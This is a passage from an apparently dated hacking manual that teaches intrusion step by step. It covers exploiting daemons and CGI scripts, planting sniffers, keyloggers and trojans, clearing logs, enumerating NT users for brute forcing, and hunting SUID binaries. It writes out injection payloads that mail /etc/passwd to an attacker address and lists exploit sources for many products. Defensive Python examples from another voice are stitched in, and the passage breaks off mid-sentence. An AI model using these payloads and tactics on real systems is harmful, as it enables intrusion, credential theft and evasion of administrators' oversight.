The rlogin port may be another point of infiltration. This is kind of like telnet, though
older and not as secure. Telnet to it and see what you can do.
The Gopher protocol was used as a text transfer protocol before the days of HTML, the
WWW, and graphics on the web. If you come across a gopher port, use a browser with a
built in gopher client (newer versions of Navigator and MIE) and connect to it. You'd be
amazed as to what the gopher service will sometimes let you see.
Write down any other ports you see. Telnet to them all, and see what happens. If after
you telnet in nothing happens, issue commands, hit enter a few times. Play around - as I
said before, 80% of what you will know will come from experience, not texts.
Remote Xploits
Again, a local exploit is something you run on your victim once you're already in. A
remote exploit is something you run from your own computer that exploits a vulnerability
on one of your target's daemons. Commonly vulnerable daemons are FTP, SMTP, and
HTTP. Oftentimes launching these will be logged on your target - so be sure to clean up
the log files and erase any entries involving you.
Again, to exploit a daemon, find out what program it is, and what version. Search the
exploit archives for an exploit for that, and if one exists, compile and run it. If the FTP
port has the service wu-ftp ver 2.2.4, go out and find the exploit for that exact service of
that exact version. If the SMTP port is running sendmail 8.8.8, get the sploit for it. These
exploits will be in the form of C code (usually), so you'll need to compile them. Most
assume that you have specific header files (*.h), so you may need to find those as well;
look at the code to be sure. To make obtaining the header files and compiling the exploits
a heck of a lot easier, you ought to think about putting a Linux partition on your hard
drive. At any rate, most remote exploits, if correctly implemented, when launched give
you root access, or at least access. To find out what service an FTP port is running, telnet
to it; it might just tell you. If not, use the SYST command, and then you'll be told. You
may have to log in to do so - try doing so anonymously. As for SMTP, it hides its
service software and version much less often than FTP does.
Elite Hacker Tactics
Up to this point, you've learned the basics of various NOS's, and how the Internet works.
"When will we get to the core hacking stuff?" You have been - breaking into a system is
nothing more than understanding it thoroughly, knowing the 'rules', what you can and can't
do. Hacking is taking what you know, and using that to circumvent usually half-hearted
attempts to keep casual onlookers from being where they aren't supposed to be. Your
most powerful weapon is a broad knowledge of computers and networks, and thorough
knowledge of your target. Meaning go get yourself a UNIX box. Well, now that you
know the basics of hacking, I'll go into some more advanced tactics you can employ to
gain access to computers on the Internet.
Service Exploitation
One of the first things you should do when you target a particular machine is telnet to
every port and find out what services are running. Find out what FTP service, and what POP
and SMTP daemons, are running (when you telnet to the appropriate port, it will usually
tell you). Then go to sploit archives like www.securityfocus.com and www.rootshell.com,
and subscribe to BugTraq and NT BugTraq. Look up every service/daemon you find, as
well as the operating system. Most exploits are in C, so you'll need to put a Linux
partition on your hard drive to get them to compile and run. If you have problems compiling
the sploits, brush up on your UNIX C utilities. Look in the manpages for cc, gcc, and
make (if there is a makefile, which makes compiling the sploits lots easier). Just remember
to chmod the xploit and make it executable, or you'll get a message that the program
couldn't be found.
CGI Exploitation
CGI (Common Gateway Interface) is a method used to make web pages more interactive.
For example: you visit your account at Hotmail. You type your username and password
into the text boxes, and click 'enter.' The Hotmail computer then reads what you typed,
and runs a script (which could be in a variety of programming or scripting languages) that
logs you into your account. That's CGI. Any time you interface with the website (such as
search engines) you are using CGI. CGI adds lots of functionality, and lots of security
issues. There are currently all kinds of known CGI exploitations. Two old ones are
http://www.someserver.com/cgi-bin/phf and http://www.someserver.com/cgi-bin/finger. If
the file in question (/cgi-bin/finger) exists, and you request it, you will get a box up. In the
box, type:
root ; mail you@youremail.address < /etc/passwd
What this does when the computer runs the script is issue the command:
finger (whatever you type in the box)
The ; operator starts a new command, which in this case is displaying the password file on
your browser. Copy it, paste it into a text file, and crack it. To find CGI exploits, get a CGI
exploit scanner (such as WebChk, available at The CyberUnderground) or use one on a web
site such as CyberArmy.com or infinityzone.cjb.net.
Another problem with CGI is that webservers that are CGI enabled have special 'CGI
executable directories'. These include /cgi-bin/ (UNIX), /cgi-win/, and /cgi-dos/ (Windows
machines). The HTTP daemon knows to execute any file requested in those directories.
Normally, when you type www.someserver.com/index.html, all that is happening is the
daemon sends you a copy of index.html. If you type www.someserver.com/cgi-bin/program,
the daemon will actually run program, if it exists. The output of this process
is usually exported to HTML format and sent to your computer. You as a hacker could
exploit this, though, by running programs of your own on the remote machine (if, say, you
had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a particular web server is vulnerable (i.e. has a CGI file
somewhere on it that can be used to gain access), you can do a number of things.
Download WebChk to scan for you. Go to a website such as infinityzone.cjb.net and use
their built-in CGI scanner. Or, for best results, obtain a list of vulnerable CGI files/servers
and use a browser to scan for them manually. Doing things yourself, rather than using
canned hacker tools, always provides better results along with expanding your own
knowledge.
Sniffing and Keylogging
Oftentimes you'll need to break into not-so-interesting computers to get to your ultimate
goal. If you are trying to break into your target network's webserver
(www.yourtarget.com), and while trying, found a vulnerability in their mail server
(mail.yourtarget.com), you have a few options on how to get into the webserver from the
mailserver. If you install a sniffer (available at many hacker sites), it will look at all data
passing it on the network for passwords and the like. It will copy and store that
information in a file for you to periodically check. Sniffing (which is considered an eleet
hacker tactic), if done correctly, almost always provides results. Another option is
installing a keylogger on the mailserver. Any keystrokes entered on that computer are
kept in a log file. Periodically check the file, and you'll usually come up with a password
to something else interesting. Be careful, though. If you don't hide your sniffers or
keyloggers well, you stand a good chance of getting busted, or at least losing any access
you had.
Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They
look at your IP address, and determine whether they should allow you in or not. Usually, this is a
router (a piece of hardware used to connect different networks) that has a list of IP
addresses to accept. If yours is not in that list, it will reject your connection. It's a good
bet that this list contains mostly machines inside that network, or from a few other trusted
networks. Oftentimes router firewalls let connections pass from other computers in the
same subnet. Let's pretend you are 203.22.54.77. You want to get into
admin.somecorp.com (34.14.91.15), which is behind the firewall. www.somecorp.com is
(like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to
admin, chances are you won't even get a login prompt, just a 'connection failed' message.
But if you telnet to www, then to admin, your IP address is that of www - 34.14.91.3,
which is in the same subnet as admin, and will most likely be accepted in. And there you
have your login prompt at admin.somecorp.com. This is conceptually hacking around a
firewall. To break right through, well, you'd better be elite. Fortunately for you, there's a
'Firewall Penetration' section near the end of this text.
Trojans
Don't assume that once you have access (be it a rootshell or just user or guest access) to a
computer, you always will. One good way to increase your chances of keeping access to
this computer is to put in a back door of some kind. The easiest (and arguably most
helpful to a hacker) is a Trojan Horse. Trojans come in all shapes and sizes, for all kinds
of OS's. The three most popular are Back Orifice, SubSeven, and NetBus. All three are
for Windows boxes (try RootKit for a UNIX Trojan). BO by itself is command line, but
GUIs (Graphical User Interfaces) are available for it. BO has a server (that you install on
your target) and a client program (that you use at home to control your target). With it,
you can browse and manipulate data and directories on your target. You can send
message boxes to the computer to scare people on it. NetBus, on the other hand, has
more functions than BO (like screenshots of your victim, opening and closing the
CD-ROM, etc.), but doesn't hide itself quite as well as BO. NetBus, like BO, has a client
and a server. Though Trojans are extremely fun for scaring sysadmins, if you want to keep
your access to the box, you should only use it as a backdoor.
Port Hacking
If you can't find any exploits for the daemon you've found, that doesn't mean it's not
vulnerable. Theoretically, every daemon bound to a TCP port is vulnerable to being used as an
access point to the computer's insides. Telnet to the port, and interact with the daemon.
At the top of your telnet window is the word 'Telnet.' As soon as it says 'Telnet
www.yourtarget.com' (or some IP address) you are connected and have established a session,
whether you see text or not. Send control characters (control-x, control-c, etc.). Type
commands like GET, GO, START, LOGON, INIT, etc. If what you type doesn't
show up on the screen, that means that the daemon isn't echoing your characters back to
you - turn on your local echo so you can see what you are typing.
For example: the HTTP GET command I explained earlier. You can do this manually -
telnet to port 80, issue a GET command with the page you want to view, hit enter twice,
and the HTML will pour across the screen. You are doing manually what Netscape,
Internet Explorer, and Lynx do for you (except that browsers parse the HTML into readable
text). Any client program that communicates with a server program on some port is just
issuing various commands to the daemon based on how the user interacts with the client
interface. Sometimes an initialization command needs to be issued before the daemon
will talk to you. Try anything you can think of. Also, it helps to know what types of
programs are bound to the port you are hacking. Refer to Appendix E on well known
ports at the end of this text.
One last note on this topic. Sometimes sysadmins, authorized users, and even other
hackers will bind a daemon to some extremely high port number as a back door. Casual
portscans will miss these, unless they are set to scan to high numbers. If you see port
12345 or 31337 open on some computer, someone was here before you - these are the
defaults used by the NetBus and Back Orifice Trojans. Also, lazy system administrators
sometimes put daemons on high port numbers that let them telnet in without a password.
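The same default ports that tell a hacker "someone was here before you" tell an administrator the same thing, which is why a periodic review of what is listening belongs in any host checklist. The Python below is an added example, not code from this manual; it parses constructed `netstat -an` style lines (the sample block is made up for the example) and flags listeners on the NetBus and Back Orifice defaults, plus any non-loopback listener on a port the administrator did not expect. NetBus listened on TCP and Back Orifice on UDP, so the table matches on port number regardless of protocol; the port table and the expected-port set are assumptions of the example.

```python
import re
from typing import List, Set, Tuple

# Default ports of the two Trojans named in the manual (table is an
# assumption of this example, not an exhaustive list of back doors).
KNOWN_BACKDOOR_PORTS = {
    12345: "NetBus default port",
    31337: "Back Orifice default port",
}

# Constructed sample of Linux `netstat -an` output, built for this example.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:40001           0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:80             203.0.113.9:51422       ESTABLISHED
udp        0      0 0.0.0.0:31337           0.0.0.0:*
"""

Listener = Tuple[str, str, int]  # (protocol, local address, local port)


def parse_listeners(netstat_text: str) -> List[Listener]:
    """Pull every listening socket out of netstat -an output.

    TCP sockets count only in LISTEN state; UDP sockets carry no state, so
    every bound one counts. Established connections are ignored.
    """
    listeners: List[Listener] = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].startswith(("tcp", "udp")):
            continue
        proto = fields[0]
        if proto.startswith("tcp") and (len(fields) < 6 or fields[5] != "LISTEN"):
            continue
        addr, _sep, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        listeners.append((proto, addr, int(port)))
    return listeners


def review_listeners(listeners: List[Listener],
                     expected_ports: Set[int]) -> List[Tuple[str, int, str]]:
    """Return (proto, port, reason) for every listener worth a second look.

    Rules, in order: a known backdoor default is always reported, even if it
    was added to the expected set; expected ports and loopback-only sockets
    are accepted; anything else is reported, with high ports (where the
    manual says back doors hide) called out separately.
    """
    findings: List[Tuple[str, int, str]] = []
    for proto, addr, port in listeners:
        if port in KNOWN_BACKDOOR_PORTS:
            findings.append((proto, port, KNOWN_BACKDOOR_PORTS[port]))
        elif port in expected_ports or addr.startswith("127."):
            continue
        elif port > 1024:
            findings.append((proto, port, "unexpected listener on high port"))
        else:
            findings.append((proto, port, "unexpected listener on privileged port"))
    return findings


if __name__ == "__main__":
    for finding in review_listeners(parse_listeners(SAMPLE_NETSTAT), {22, 25, 80}):
        print("%s/%d: %s" % finding)
```

Run on a real host, feed it the output of `netstat -an` and the port list from the host's build document; a finding on a port above 1024 that nobody can account for is exactly the "extremely high port number" back door the paragraph above describes.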
NT: The SID
In an NT environment, every user, group, and domain has a unique numeric value that
represents it. If you change the name of a particular group, this number - the SID (Security
IDentifier) - stays the same, so the group's properties remain unchanged. And with a valid
connection to an NT box, you can use the SID to find valid login names for that machine
(if you have a connection to the PDC you'll get login names for the whole domain).
You'll do this with the infamous user2sid and sid2user tools, available at
www.hackingexposed.com. Getting every username is invaluable for Brute Forcing - put
the names you find into a text file and use NAT, Legion 2.1, or Brutus to take care of the
rest. The first step, though, is connecting to the box in question. Use the Net View
command - if you don't have a login name, the null IPC session technique will usually
work (net use \\ip_add\ipc$ /user:). Once you get a 'command was completed
successfully' for any net use command, you're connected, and can use the sid tools to get
every username. (The reason this works is because the LookupAccountName and
LookupAccountSid Win32 system calls can be called by anyone with Everyone access,
including someone with a null IPC session.) Let's say you null-IPC'd 38.100.200.1. You
want to find members of the group Domain Users, which is essentially everyone (this
works only if 38.100.100.1 is a domain controller - Domain Users doesn't exist on non-DCs).
You'd type this at a command prompt:
C:\toolz>user2sid \\38.100.100.1 domain users
Which would give you that group's SID. Pretend you get:
S-1-5-7464736-37373837-513
We are interested in the last three digits of the SID: 513. These last digits are the RID.
The RID is the only number that will be different for every other user and group SID.
Meaning every other SID in this domain will start with:
S-1-5-7464736-37373837
And a different 3-digit RID exists for every group and user. We now know that Domain
Users' RID is 513. The Administrator account is always RID 500. To verify that, we'll do
this:
C:\toolz>sid2user S-1-5-7-464736-37373837-500
User Admini
There - it told us the user for that SID. Only this sysadmin thinks he's slick by changing
the Administrator account to Admini. Heh. Now, run sid2user against every RID
from 501 until you get an error saying no such SID. So next you'd:
C:\toolz>sid2user S-1-5-7-464736-37373837-501
User asmith
And so forth. If you're connected to a non-domain controller (member server), you'll get
every user for that box. If it's a DC, you'll get every global user - that is, every user
associated with the domain itself, not an individual computer. Now you have a list of login
names to BF.
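The lesson an administrator should take from the section above is that renaming the Administrator account hides nothing, because the RID is fixed: RIDs below 1000 are reserved for built-in accounts and groups (500 Administrator, 501 Guest, 512 Domain Admins, 513 Domain Users, 514 Domain Guests), and accounts an administrator creates are numbered from 1000 upward. The Python below is an added example, not code from this manual or from the user2sid/sid2user tools; it parses textual SIDs into prefix and RID, classifies RIDs, and checks an exported list of (name, SID) pairs for built-in accounts that have been renamed, so the owner of a domain can see what a null-session enumeration would reveal. The account list in the test is constructed; the well-known RID table is a fact of NT, and what the NT side actually needs against this technique is to refuse anonymous enumeration (the RestrictAnonymous value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, introduced with NT 4 SP3).

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Fixed by Windows itself: RIDs below 1000 are reserved for built-in accounts
# and groups; accounts created by the administrator are numbered from 1000 up.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
}

# S-<revision>-<identifier authority>-<sub-authority>...-<RID>
_SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


class Sid(NamedTuple):
    revision: int
    authority: int
    sub_authorities: Tuple[int, ...]

    @property
    def rid(self) -> int:
        """Relative identifier: the last sub-authority."""
        return self.sub_authorities[-1]

    @property
    def domain_prefix(self) -> str:
        """Everything but the RID; shared by every SID issued by one domain."""
        return "S-%d-%d-%s" % (
            self.revision, self.authority,
            "-".join(str(s) for s in self.sub_authorities[:-1]))

    def __str__(self) -> str:
        return "%s-%d" % (self.domain_prefix, self.rid)


def parse_sid(text: str) -> Optional[Sid]:
    """Parse the textual S-R-A-S1-...-Sn form; return None if it is not a SID."""
    m = _SID_RE.match(text.strip())
    if not m:
        return None
    subs = tuple(int(s) for s in m.group(3).split("-") if s)
    return Sid(int(m.group(1)), int(m.group(2)), subs)


def rid_class(rid: int) -> str:
    """Name the RID if it is well known, otherwise say which range it is in."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid < 1000:
        return "reserved well-known RID"
    return "user-defined account or group"


def find_renamed_builtins(accounts: List[Tuple[str, str]]) -> List[Tuple[str, int, str]]:
    """Report accounts whose RID is well known but whose name no longer matches.

    Input is (name, sid) pairs as exported from a directory or audit tool.
    Returns (current name, rid, built-in name), making it plain that a renamed
    Administrator is still identifiable by RID 500.
    """
    renamed = []
    for name, sid_text in accounts:
        sid = parse_sid(sid_text)
        if sid is None:
            continue
        builtin = WELL_KNOWN_RIDS.get(sid.rid)
        if builtin and name.lower() != builtin.lower():
            renamed.append((name, sid.rid, builtin))
    return renamed


if __name__ == "__main__":
    # Constructed export, mirroring the manual's Admini example.
    export = [("Admini", "S-1-5-7464736-37373837-500"),
              ("asmith", "S-1-5-7464736-37373837-1001")]
    for name, rid, builtin in find_renamed_builtins(export):
        print("%s is RID %d: built-in %s, renamed" % (name, rid, builtin))
```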
UNIX: SUID Binaries
This is a biggie for any aspiring UNIX hacker. You get access to a UNIX box, and want
root. Your first step should be the password file. If it's protected (you don't have access
to it), next you'd look for common vulnerabilities - and local exploits for them. Check the
System Exploits section below for common ones. If you don't see any at first glance, that
doesn't mean there are no vulnerable filez. Daemons aren't the only programs vulnerable
to buffer overflows. Any binary (executable) might be vulnerable. These binaries have
access privileges of their own - just like a user. They can be denied or accepted access to
other resources just like a user can. All users and binaries have UIDs (User IDs) and
GIDs (Group IDs) - and the lower the better (root being zero). Binaries with low
privileges (high-number UIDs) will often be denied when they try to access other files.
Binaries with higher privileges (lower UIDs) will have more access. So naturally we want
to sploit a binary with root-equivalent privileges, or perms (permissions). Binaries with
Superuser User IDs - SUID perms. And with one command line you can find every
SUID binary on the system:
$ find / -type f -perm -04000 -ls
The output of this command will give you every binary with SUID perms, or root
privileges. The list will probably be pretty big. Go to an exploit archive with a searchable
database (Rootshell or SecurityFocus) and look up every SUID binary you found.
Chances are one will be vulnerable - get the code, run it, and you'll have root.
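The find command above is the same one a sysadmin should be running on a schedule: the set of set-user-ID (the "S" in SUID stands for set, not superuser) and set-group-ID files on a healthy system changes only when packages are installed, so a new entry that nobody can explain is the classic sign of a planted back door, and a missing one can mean a binary was replaced by a copy without the bit. The Python below is an added example, not code from this manual; it walks a tree the way `find -perm -04000` does, also catches SGID files (`-perm -02000`), and diffs the result against a baseline of known-good paths. The demo tree it builds is constructed for the example, so it can be exercised without scanning `/`.

```python
import os
import stat
import tempfile
from typing import Dict, List, Set, Tuple

try:
    import pwd  # absent on Windows; only used to print owner names
except ImportError:  # pragma: no cover
    pwd = None

SetIdEntry = Tuple[str, int, int]  # (path, owner uid, permission bits)


def find_setid_files(root: str) -> List[SetIdEntry]:
    """Return every regular file under `root` with the set-UID or set-GID bit.

    Equivalent to the manual's `find / -type f -perm -04000` plus SGID files.
    lstat is used so symlinks are never followed, and unreadable directories
    are skipped rather than aborting the whole scan.
    """
    found: List[SetIdEntry] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return sorted(found)


def diff_against_baseline(current: List[SetIdEntry],
                          baseline: Set[str]) -> Dict[str, List[str]]:
    """Compare a fresh scan with the paths recorded on a known-good system."""
    paths = {path for path, _uid, _mode in current}
    return {"new": sorted(paths - baseline), "missing": sorted(baseline - paths)}


def format_entry(entry: SetIdEntry) -> str:
    """One report line: set-ID flags, owner, octal mode, path."""
    path, uid, mode = entry
    owner = str(uid)
    if pwd is not None:
        try:
            owner = pwd.getpwuid(uid).pw_name
        except KeyError:
            pass
    flags = ("u" if mode & stat.S_ISUID else "-") + ("g" if mode & stat.S_ISGID else "-")
    return "%s %s %04o %s" % (flags, owner, mode, path)


def make_demo_tree() -> Tuple[str, str, str]:
    """Build a throwaway directory with one set-UID file and one plain file.

    Constructed input for the example; returns (root, suid path, plain path).
    """
    root = tempfile.mkdtemp(prefix="setid-demo-")
    suid_path = os.path.join(root, "suid-bin")
    plain_path = os.path.join(root, "plain-bin")
    for path, mode in ((suid_path, 0o4755), (plain_path, 0o755)):
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return root, suid_path, plain_path


if __name__ == "__main__":
    demo_root, _suid, _plain = make_demo_tree()
    scan = find_setid_files(demo_root)
    for entry in scan:
        print(format_entry(entry))
    print(diff_against_baseline(scan, set()))
```

In production, record the scan from a freshly installed host as the baseline, rerun `find_setid_files("/")` from cron, and alert on any non-empty "new" or "missing" list.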
Peering through the Eyes of your Enemy
Hacking pits you against a system. This system, be it a huge inter-network or just one
computer, is nothing by itself. Servers don't run and secure themselves. An administrator,
or sysadmin, runs them. Hacking into his box is going head-to-head with the sysadmin.
So how do you gain the competitive edge? You need to see the playing field from his
point of view.
There will come times when the prewritten exploits don't work on your target system, and
brute force either didn't work or is too unstealthy for a hacker as leet as you. What do
you do? Well, suppose the server you're trying to crack is a Netscape Enterprise Server.
Install Enterprise Server on your machine. By doing this, you'll get a number of valuable
pieces of info:
Default Directory Structures - where you can find stuff
Default Passwords - worth a try
Out-of-the-box scripts - CGI stuph that you could exploit
If you're serious about hacking a system, you (usually) are better armed knowing about it.
And the more the better. Most server software will have a free evaluation version.
Otherwise check the warez pages.
No matter what server you're hacking, you definitely want some kind of UNIX partition
and an NT partition. Get RedHat, SuSE, or Caldera Linux (most versions are around
$30) and play with it. Set up an account with no privileges. Download exploits (remote
and local) and try to get root on your own box. Then do the same with NT. Try the
getadmin and iishack exploits. Once you have a feel for how these more common xploits
work, you'll be better at using them against a real target.
System Exploits
You target a network. Scan ports on every machine, telnet to every open port to find out
what service is running, and look up every service at every exploit archive. Within a few
hours, you'll have a list of at least a few vulnerabilities, meaning a couple of ways in.
Remember: in every network there is always at least one insecure computer. And from
that box you can hack the rest of the network without much trouble (using local exploits
and passwords stolen from the first system you hacked). Here, again, is a list of places to
go to look for exploits. If you find info on one exploit somewhere, still check the others
for better or updated info.

www.rootshell.com
www.securityfocus.com
www.ntbugtraq.com
www.insecure.org
www.anticode.com
www.infilsec.com/vulnerabilities
www.xforce.iss.net
www.hoobie.net/security/exploits
www.net-space.org/lsv-archive/bugtraq.html
home.cyberarmy.com/tcu

Here I will go over specific vulnerabilities to look for in any system you're trying to hack.
For more info on each of these, visit the exploit archives above. Most give either an
explanation on how to exploit the security bug, or offer code that will do it for you.
MS Front Page ASP Dot and ASP Alternate Data Stream Vulnerabilities (remote)
These exploits affect FrontPage version 3. Any ASP file (the NT equivalent of UNIX .cgi
files) is viewable to a hacker by just appending a dot to the end (e.g. request somefile.asp
like this: somefile.asp.). ASP code oftentimes contains local file references and even
usernames and passwords.
Another way to view ASP code is to append the string ::$DATA to the URL, e.g.
somefile.asp::$DATA. If the server you're targeting is patched against the dot
vulnerability, try this one.
IIS Remote Buffer Overflow Vulnerability (remote)
A lot of IIS Webservers (IIS is the webserver that comes with NT) are vulnerable to this
exploit. Using the exploit code iishack.asm (assembly) or iishack.exe (win32 binary) you
can force the IIS web daemon to download and run any file on the Net you specify,
including ncx or NetBus. The code is available at www.technotronic.com and
www.eeye.com.
IIS RDS Vulnerability (remote)
A lot of IIS Servers are also vulnerable to this attack. If the server has Remote Data
Service enabled (including msadc.dll - which many do) you can run the exploit code from
your home computer and send commands to the server. Copy
\winnt\system32\repair\sam._ to \inetpub\wwwroot\ and download the SAM hive. The
exploit code is available at rootshell and securityfocus.
WebSitePro Vulnerabilities (remote)
Out of the box, WebSitePro for NT has a few vulnerabilities. The CGI file uploader.exe
allows anyone to upload files. Check for it in /cgi-win/, /cgi-dos/, /cgi-bin/, or /cgi-shl/.
Also, any files you upload into any of these directories can be executed (by just requesting
them with your browser). Can you say Netbus?
NT Getadmin Exploit (local)
The executable exploits getadmin.exe and sechole.exe will make any user of the machine a
member of the Administrators and Domain Admins groups. If you hack into an NT box
with a user account that doesn't have a whole lot of permissions, use one of these exploits.
They're available at anticode.
NT RAS Buffer Overrun (local)
This local exploit exploits rasman.exe into spawning a rootshell (command prompt with
system privileges). The exploit code and more info are available at
www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.
Winhlp32 Buffer Overrun (local)
Using the exploit code, a hacker can run a batch file with system privileges. Put rdisk /s in
the batch file to dump the SAM onto the hard disk. Exploit code and an explanation at
www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.
Cold Fusion Vulnerabilities (remote)
Cold Fusion has its own scripting language for CGI. These scripts are .cfm files. The
/cfdocs/expeval/openfile.cfm file allows you to upload any file to the server. The problem
is, the /cfdocs/expeval/exprcalc.cfm file (the script used to view the file you uploaded)
deletes the file after you view it. Openfile.cfm exists to help you debug a cfm file of your
own. The vulnerability: exprcalc.cfm can be manipulated to delete itself - which will keep
it from deleting files you upload. L0pht's website, along with SecurityFocus, has a cfm
script you can upload (called mole.cfm) that gives you full access to the server.
Apache PHF and Finger Vulnerabilities
These are two very old vulnerabilities, but still exist on some servers, and are worth
mentioning. Apache (a popular Linux webserver) stores its CGI scripts in /cgi-bin/ (which
is common). If /cgi-bin/phf exists, you can enter the following URL:
http://www.abouttobehacked.com/cgi-bin/phf?Qalias=x%Oa/bin/cat%20/etc/passwd
And you will have the /etc/passwd file cat-ed (displayed) in your browser. Crack it with
John the Ripper and you're in. If /cgi-bin/finger exists, you can use the text box on this
page to finger the box. If you enter root in the box, a shell will execute finger root on
the UNIX box. So if you type root ; /bin/mail you@hacker.com < /etc/passwd the shell
will execute finger root ; mail you@hacker.com < /etc/passwd. A semicolon separates
commands in UNIX, so what happens is the shell executes finger root, then executes
/bin/mail you@hacker.com < /etc/passwd. This mails the password file directly to your
email account. It's kinda like breakfast in bed.
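The finger CGI described in the CGI Exploitation section above and again in this entry is the textbook command injection: the form field is pasted into a shell command string, so a semicolon ends the finger command and starts whatever follows. The Python below is an added example, not code from this manual or from the old Apache sample CGIs; it shows the vulnerable construction next to a hardened handler that allow-lists the login name and calls finger with an argv list instead of a shell. The login-name pattern is an assumption of the example, and the vulnerable function returns the command string rather than executing it so the effect can be inspected offline.

```python
import re
import shlex
import subprocess
from typing import List


def vulnerable_finger_command(user_field: str) -> str:
    """What the broken CGI hands to /bin/sh (returned, not executed).

    The field is glued into a command string, so ';' in the field starts a
    second command. This is the bug the manual's finger example relies on.
    """
    return "finger " + user_field


def shell_sees(command: str) -> List[List[str]]:
    """Split a command line on ';' the way the shell would (simplified model:
    no quoting of ';' inside a word). Used only to make the injection visible."""
    commands = []
    for segment in command.split(";"):
        words = shlex.split(segment)
        if words:
            commands.append(words)
    return commands


# Hardened pattern. A conservative login name: lower-case letter or '_' first,
# then letters, digits, '_' or '-', at most 32 characters. (Assumption of this
# example; tighten or loosen to the site's naming rules.)
_LOGIN_NAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def is_safe_query(user_field: str) -> bool:
    """True only if the field is a plain login name with no shell syntax."""
    return _LOGIN_NAME.match(user_field) is not None


def safe_finger_argv(user_field: str) -> List[str]:
    """Return an argv list for the query, or raise ValueError.

    No shell metacharacter survives the allow-list, and because the result
    is an argv list rather than a command string, ';', '|' and '<' would be
    passed to finger as literal argument bytes even if the pattern were
    loosened: no shell is ever involved.
    """
    if not is_safe_query(user_field):
        raise ValueError("rejected finger query: %r" % user_field)
    return ["finger", user_field]


def run_finger(user_field: str, timeout: float = 5.0) -> str:
    """Execute the validated query without a shell (not exercised offline)."""
    result = subprocess.run(safe_finger_argv(user_field), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    field = "root ; mail you@hacker.com < /etc/passwd"
    print("shell would run:", shell_sees(vulnerable_finger_command(field)))
    print("hardened handler accepts it:", is_safe_query(field))
```

The two halves differ in one decision: whether user input becomes part of a string a shell parses, or one argument in a list the kernel passes verbatim. Validation is the first line, but the argv list is what makes the second command impossible even when validation is wrong.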
Apache Test-cgi hole (remote)
The cgi file /cgi-bin/Test-cgi is used to test the server-side functionality of Apache CGI.
You can exploit it to peruse directories. To see everything in the /cgi-bin/ directory, you'd
request http://www.victim.com/cgi-bin/Test-cgi?*. This will show you all the cgi files,
including other vulnerabilities. To see what's in /etc of the server, you'd request
/cgi-bin/Test-cgi?/etc/*. The output of any of these requests will list general info. The query
field of this output will return your response: the directory listing. Try it - it works.
Apache count.cgi hole (remote)
The file /cgi-bin/count.cgi displays a counter on the webpage, returning the number of
hits to that page. It is vulnerable to a buffer overflow, though. The C code to do so is
available at Rootshell, SecurityFocus, and a few other archives.
AIX crontab vulnerability
AIX UNIX machines have a file called crontab, which is vulnerable to a buffer overflow.
Get the exploit code at www.sw.com.sg/Download/cert_advisories/CA92:10.AIX.crontab.vulnerability, or rootshell or securityfocus.
ProFTPd Buffer Overflow vulnerability (remote)
ProFTP version 1.2.0 is vulnerable to a buffer overflow that will spawn a rootshell for
you. Get the code at rootshell.com.
CuteFTP Weak Encryption Vulnerability (remote / local)
Tree.dat (ver 2.X) or smdata.dat (ver 3.X) holds encrypted FTP passwords. Hardly
encrypted, though - the algorithm is nothing more than adding the 48h ASCII value to
each character. Meaning the number of characters in the hash is the number of characters
in the clear-text password. And you don't even need a password cracker - just grab an
ASCII chart and add 48h to each character - you'll get every password in the file.
Wu-FTPd Signal Exploit (remote / local)
If your target has a vulnerable version of wuftpd (the WU FTP daemon), and you have any
access (including guest, username ftp), the signal exploit will overspill the incoming FTP
buffer, giving you a shell with root privileges. Rootshell and SecurityFocus have the C
code for the signal exploit.
IRIX Line Printer Vulnerability (remote)
This exploit doesn't require a script or even CGI exploitation. Certain versions of AIX (by
default) have the lpr login name unpassworded. To log in, just hit enter when prompted for
a password. Later versions fix this problem, and security-savvy sysadmins will change the
password or disable the account.
Linux RCP Vulnerability (remote)
Certain versions of Slackware and Redhat that have a listening RCP (remote copy) are
vulnerable to a buffer overflow. This can be exploited to gain a shell with the privileges of
the user nobody. For specific info, visit www.geek-girl.com/bugtraq/1997_1/0113.html
SunOS / Solaris rlogin Vulnerability (remote)
Yes, the rlogin daemon of some Sun machines is vulnerable to a buffer overflow that will
lead to a root compromise. Get the code at Rootshell, SecurityFocus, or
rtfm.ml.org/archives/bugtraq/Nov_1997/msg00181.html.
AIX dtterm Vulnerability (local)
Get a rootshell with a vulnerability in dtterm for AIX. Get the exploit at
esperosun.chungnam.ac.kr/~jmkim/hacking/1997/07%26before/aix_dtterm.c
AIX mount Vulnerability (local)
The mount utility - used to mount local disk drives and remote network filesystems - is
vulnerable to a buffer overflow. The sploit is at
samarac.jfactorx.org/Exploits/AIX_mount.c
Solaris X86 PPP Vulnerability (local)
There are a few vulnerabilities in Solaris's implementation of PPP that will give you the
